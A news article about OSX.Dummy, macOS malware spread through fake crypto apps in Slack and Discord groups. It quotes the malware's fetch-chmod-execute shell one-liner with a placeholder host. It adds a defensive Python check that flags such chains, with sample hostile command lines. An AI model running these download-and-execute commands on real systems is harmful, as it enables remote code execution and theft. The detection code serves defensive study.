Hackers have allegedly targeted cryptocurrency discussion groups on the workplace chat platform Slack and the gaming chat platform Discord in order to infiltrate members’ computers with “cryptojacking” software.
Discord and Slack Users Affected
Identified as OSX.Dummy, the macOS-based malware is not as sophisticated as other masterfully written hacking code, yet allows “arbitrary code execution on machines that it can get embedded into.”
Researchers from cybersecurity consortium Unix found evidence of OSX.Dummy, with Remco Verhoef of SANS’ InfoSec confirming a series of malicious attacks on macOS Slack applications on June 30, 2018.
Reportedly, members of several chatrooms on Discord and Slack have raised issues with system administrators about people who impersonate influential group members and send a harmless-looking link to a “useful” cryptocurrency mobile app.
The Malicious Code
On installing, the app downloads and executes the binary through the shell command “cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script”. The downloaded file, named script, is 34 MB and contains the OSX.Dummy software.
The file is a “regular” 64-bit Mach-O binary that executes on a macOS system. Because the code is obscure, online malware scanners and built-in antivirus software fail to recognize it as a threat.
Normally, an unsigned binary such as the OSX.Dummy file cannot run on the operating system because of its built-in security checks. However, the macOS security feature “Gatekeeper” does not check files that the user has downloaded and run directly from a system terminal, which, notably, is the only way to run the “helpful” software.
Subsequently, the software prompts users to enter their master password, which gives the unauthorized code access to all underlying data, features, and passwords of the victim system. As a final step, the victim computer automatically connects to a C2 server, giving the attackers full access to the machine.
As the victim was from a cryptocurrency-related forum, this process provides attackers direct access to private addresses, emails, passwords, and security keys of the user, proving to be a basic yet effective “cryptojacking” process.
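Because Gatekeeper does not intervene when a file is fetched and run from a terminal, the download, chmod and execute chain in the one-liner above is itself the signal a defender can look for in shell history or process-execution logs. The following Python check is an added example, not code from the original report; the function name and the sample command lines are constructed for illustration, and it assumes full command lines are available to inspect.

```python
import posixpath
import re
import shlex

# Output-file options of two common downloaders; ">" redirection is handled separately.
OUTPUT_FLAGS = {"curl": {"-o", "--output"}, "wget": {"-O", "--output-document"}}
# chmod modes that set an execute bit: symbolic (+x, a+rx) or octal with an odd digit (755).
EXEC_MODE = re.compile(r"[ugoa]*\+[rwx]*x[rwx]*|[0-7]*[1357][0-7]*")

def _resolve(cwd, path):
    return posixpath.normpath(posixpath.join(cwd, path))

def find_download_and_run(command_line):
    """Return paths that one command line downloads, marks executable, then runs."""
    cwd, downloaded, executable, hits = ".", set(), set(), []
    for segment in re.split(r"&&|\|\||;", command_line):
        try:
            tokens = shlex.split(re.sub(r">+", " > ", segment))
        except ValueError:  # unbalanced quotes: fall back to a plain split
            tokens = segment.split()
        if not tokens:
            continue
        cmd, args = posixpath.basename(tokens[0]), tokens[1:]
        if cmd == "cd" and args:
            cwd = _resolve(cwd, args[0])  # follow "cd /tmp" so later names resolve
        elif cmd in OUTPUT_FLAGS:
            for flag, value in zip(args, args[1:]):
                if flag == ">" or flag in OUTPUT_FLAGS[cmd]:
                    downloaded.add(_resolve(cwd, value))
        elif cmd == "chmod" and len(args) >= 2 and EXEC_MODE.fullmatch(args[0]):
            executable.update(_resolve(cwd, a) for a in args[1:])
        elif "/" in tokens[0]:  # a path run as a command, e.g. ./script
            target = _resolve(cwd, tokens[0])
            if target in downloaded and target in executable:
                hits.append(target)
    return hits

# Constructed sample command lines; the first is the one-liner quoted in the article.
SAMPLES = [
    "cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script",
    "wget -O /tmp/tool https://example.invalid/tool; chmod 755 /tmp/tool; /tmp/tool",
    "cd /tmp && curl -s https://example.invalid/notes.txt > notes.txt && cat notes.txt",
    "chmod +x ./build.sh && ./build.sh",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(find_download_and_run(line) or "clean", "<-", line)
```

The check only sees chains written on a single command line; the same three steps typed as separate commands would need correlation across log entries.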
The new cyber threat of cryptojacking is loosely defined as hackers infiltrating a victim’s computer to use its processing power to mine cryptocurrencies. However, the relatively weak security measures exercised by businesses and users alike make the cryptocurrency sector a soft and highly profitable target. As reported by BTCManager in June 2018, the illicit activity of mining cryptocurrencies from a victim computer has surged by 629 percent in 2018 alone, with attackers showing no signs of stopping any time soon.